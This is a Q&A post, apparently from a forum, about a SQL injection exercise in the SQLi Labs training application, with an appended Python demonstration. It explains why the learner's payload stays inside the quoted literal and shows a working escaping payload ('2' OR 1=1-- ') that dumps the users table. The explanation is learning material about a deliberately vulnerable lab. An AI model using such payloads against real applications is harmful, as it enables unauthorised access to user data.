I am learning some SQL injection basics. I have a vulnerable application (SQLi Labs), so I can see the source code, and I am trying to figure out how the URL should be parameterized to give back the same result as the mysql interface does. However, there is a difference which I cannot solve, so please help me.
This is the PHP code:
$id=$_GET['id'];                                   // read straight from the ?id= query parameter, no filtering
$sql="SELECT * FROM users WHERE id='$id'";         // $id is interpolated inside single quotes (injectable)
$result=mysql_query($sql);
$row = mysql_fetch_array($result);                 // one call fetches only the first row of the result set
This is the mysql query:
mysql> select * from users where id=3--'' OR 1=1;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
This is the URL:
http://192.168.19.155/sqli-labs/Less-1/?id=2--%20%27%27%20OR%201=1
The URL gives me back only one row (the one defined in the "?id=2" option); the rest of the query (--%20%27%27%20OR%201=1) seems to be ignored.
The URL query should give back the whole users table, as the mysql interface does. There is no input filtering, so I cannot understand why the URL result does not equal the mysql interface output. Please help me!
Thank you! Erik
Actually, mysql_fetch_array returns information about only one row. You can modify the script to get the expected response this way:
while ($row = mysql_fetch_array($result)) {   // keep fetching until no rows are left
    print_r($row);                             // dump every row, not just the first one
}
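The following is an added example, not code from the question or the answer above, that shows both halves of the problem: why the id parameter from the question's URL never leaves the single-quoted string literal in the PHP query, and why even a payload that does close the literal still shows a single row when mysql_fetch_array is called once. It mimics the PHP interpolation in Python and runs the resulting query against an in-memory SQLite table containing a constructed subset of the users table. The "escaping" payload is an assumption of this example (its trailing space matters, since MySQL's "--" comment needs whitespace after it). One caveat: for the original payload SQLite returns no rows, whereas MySQL compares the string to the numeric id column by its leading numeric prefix and returns the id=2 row, which is exactly what the question observed.

```python
"""Mirror the PHP query building and show what the database parser sees."""
import sqlite3
from urllib.parse import quote, unquote

# Constructed subset of the users table shown in the question.
USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
    (8, "admin", "admin"),
]

BASE_URL = "http://192.168.19.155/sqli-labs/Less-1/?id="
PREFIX = "SELECT * FROM users WHERE id="          # fixed part of the PHP query

# The exact id parameter from the question's URL, URL-decoded.
ORIGINAL_PAYLOAD = unquote("2--%20%27%27%20OR%201=1")     # -> 2-- '' OR 1=1
# Assumed payload for this example: closes the literal first, then comments
# out the trailing quote. MySQL needs whitespace after "--", hence the space.
ESCAPING_PAYLOAD = "2' OR 1=1-- "


def build_query(id_param: str) -> str:
    """Mirror $sql="SELECT * FROM users WHERE id='$id'": raw interpolation."""
    return f"{PREFIX}'{id_param}'"


def outside_quotes(sql: str) -> str:
    """Return the characters the parser treats as SQL syntax, i.e. everything
    outside single-quoted literals. Inside a literal, '' and \\' are escaped
    quotes (MySQL default), not closing quotes."""
    out, in_str, i = [], False, 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\" and i + 1 < len(sql):      # backslash escape: skip next char
                i += 2
                continue
            if c == "'":
                if sql[i + 1:i + 2] == "'":         # '' stays inside the literal
                    i += 2
                    continue
                in_str = False                      # real closing quote
        elif c == "'":
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


def injected_syntax(id_param: str) -> str:
    """SQL syntax the payload contributes beyond the fixed prefix.
    Empty string means the whole payload was swallowed by the literal."""
    return outside_quotes(build_query(id_param))[len(PREFIX):]


def as_url(id_param: str) -> str:
    """URL-encode the payload the way a browser or curl should send it."""
    return BASE_URL + quote(id_param, safe="")


def run(id_param: str, fetch_all: bool) -> list:
    """Execute the interpolated query against SQLite. fetch_all=False mimics a
    single mysql_fetch_array() call (first row only); True mimics the loop.
    Note: SQLite does not cast '2-- ...' to 2 the way MySQL does, so the
    original payload yields no rows here but the id=2 row on MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    rows = conn.execute(build_query(id_param)).fetchall()
    conn.close()
    return rows if fetch_all else rows[:1]


if __name__ == "__main__":
    for p in (ORIGINAL_PAYLOAD, ESCAPING_PAYLOAD):
        print(as_url(p))
        print("  query  :", build_query(p))
        print("  syntax :", repr(injected_syntax(p)))
        print("  1 fetch:", run(p, fetch_all=False))
        print("  loop   :", run(p, fetch_all=True))
```

Running it shows that the original payload adds no SQL syntax at all (the `''` inside the literal is an escaped quote, so `OR 1=1` is just text being compared to the id column), while the escaping payload contributes ` OR 1=1-- ` outside the literal and returns every row, but only when all rows are fetched in a loop as the answer suggests.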